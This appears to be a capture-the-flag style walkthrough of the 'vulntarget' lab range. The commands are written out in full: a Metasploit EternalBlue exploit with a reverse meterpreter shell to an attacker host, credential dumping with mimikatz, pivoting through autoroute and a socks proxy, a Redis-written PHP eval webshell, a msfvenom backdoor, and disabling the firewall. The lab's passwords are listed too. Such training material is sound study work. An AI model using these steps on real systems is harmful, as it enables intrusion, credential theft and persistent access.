Title: vulntarget shooting range series-a-writeup

Network Configuration

External network WIN7: ip1: 192.168.127.91/255.255.255.0, gw:192.168.127.2 (NAT mode) ip2:10.0.20.98-vmnet1 (host mode only) Domain host member: 10.0.20.99-vmnet1 (host mode only) 10.0.10.111-vmnet2 (host mode only) Domain control: 10.0.10.110-vmnet2 (host mode only) Password configuration: Win7: win7/adminwin2016: Administrator/Admin@123, vulntarget.com\win2016 Admin#123win2019: vulntarget.com\administrator Admin@666

Information Collection

Scan the host arp-scan -l Scan the surviving host in the same network segment Discover a surviving host :192.168.127.91 Scan the port to scan the IP address of the surviving target machine

nmap -sC -T4 192.168.127.91 Found that the target system is win7, and the 445 port is open. Try to use Eternal Blue (ms17-010) to hit the target system

Intranet host penetration

Enter the command in kali: msfconsolemsf 6 search 17-010msf 6 use 0msf 6 set payload windows/x64/meterpreter/reverse_tcpmsf 6 set lport 6666msf 6 set lhost 192.168.127.129msf 6 set rhosts 192.168.127.91msf 6 run meterpretershellC:\Windows\System32ipconfig I found some garbled code, so I just set C:\Windows\System32CHCP 65001 #65001 UTF-8 code page C:\Windows\System32ipconfig #I found two network segments, one is the 192.168.127 network segment, and the other is the 10.0.20 network segment C:\Windows\System32whomai # Check the current user's permissions as system permissions C:\Windows\System32tasklist/svc #View the process and found that there is no Killer in the system C:\Windows\System32exit #Exit shell command terminal meterpreterload kiwi #Load mimikataz module meterpretercreds_all #Get the login credentials for all current users, find that the user name is win7 and the password is: admin

Web penetration

Direct access, http://192.168.127.91/, found that it is Tongda OA View the version number of Tongda OA. The current version is 11.3http://192.168.127.91/inc/expired.php Search for Tongda 11.3 Existing file contains vulnerabilities through search engines: https://blog.csdn.net/hackzkaq/article/details/115900500 Use one-click graphical tool to obtain webshell Connect successfully using ant sword Also, the permission to view the current user under the command terminal of the Ant Sword is system permission

Handalone penetration

When a process is migrated and obtained a shell, the shell is extremely fragile, so it is necessary to move the shell to bind it to a stable process in the target machine without any write operations to the disk, which makes penetration more difficult to detect.

After the automatic migration process command (run post/windows/manage/migrate), the system will automatically find the appropriate process and then migrate meterpreter run post/windows/manage/migrate #Migrate from spoolsv.exe of 1080 to the 4800 process of noepad.exe View the local network connection sub-segment meterpreter run get_local_subnets Add a dynamic route meterpreter run autoroute -s 10.0.20.0/24 or meterpreter backgroundmeterpreter sessionsmsf6 exploit(windows/smb/ms17_010_eternalblue) use post/multi/manage/autoroutemsf6 exploit(windows/smb/ms17_010_eternalblue) set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) run meterpreter background Discover the surviving host msf6 exploit(windows/smb/ms17_010_eternalblue) use post/windows/gather/arp_scannermsf6 exploit(windows/smb/ms17_010_eternalblue) set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 10.0.20.1-254msf6 exploit(windows/smb/ms17_010_eternalblue) run Another surviving host was found 10.0.20.99 to enable socks5 proxy msf6 exploit(windows/smb/ms17_010_eternalblue) use auxiliary/server/socks_proxymsf6 auxiliary(server/socks_proxy) run Port scanning first, you need to modify the /etc/proxychain4.conf configuration file

vim /etc/proxychains4.confsocks5 127.0.0.1 1080 Scan the commonly used ports of the target IP through nmap proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080 Found that the 10.0.20.99 host is open to ports 6379 and 80. Here is a local socks5 proxy client service proxifier software scanned through dirsearch and found that the target has a phpinfo.php sensitive information page python3 dirsearch.py -l url.txt -t 10 -e * -i 200,302 --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv or execute proxychains under attack machine kali python dirsearch.py -u http://10.0.20.99 -i 200proxychains dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:1080 -t 5 Visit the phpinfo.php page to find that the absolute path of the website was exposed: C:/phpStudy/PHPTutorial/WWW/http://10.0.20.99/phpinfo.php

http://10.0.20.99/l.php

Redis Unauthorized Access

Remote connection without password through redis-cli command proxychains redis-cli -h 10.0.20.99

Redis writes to webshell

10.0.20.99:6379 CONFIG set dir 'C:/phpStudy/PHPTutorial/WWW/' #Switch to the absolute path that can be written to the shell 10.0.20.99:6379 set x '\n\n\n?php @eval($_POST['x']);\n\n\n' #Write a sentence Trojan 10.0.20.99:6379 config set dbfilename shell.php #Set the file name as shell.php10.0.20.99:6379 save Here is a proxy through the ant sword on the local host, and connect to webshell View the current user permission is system

Upload MSF backdoor

Generate forward shellcodemsfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe shell.exe Use ant sword to upload shell.exe to 10.0.20.99 and execute to configure the listener

use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 3333set RHOST 10.0.20.99run Close the firewall netsh firewallsetopmodemode=disable Run shell.exe in the ant sword command terminal Collect the same network segment host meterpreter arp Scan the 10.0.10.110 network segment migration process run post/windows/manage/migrate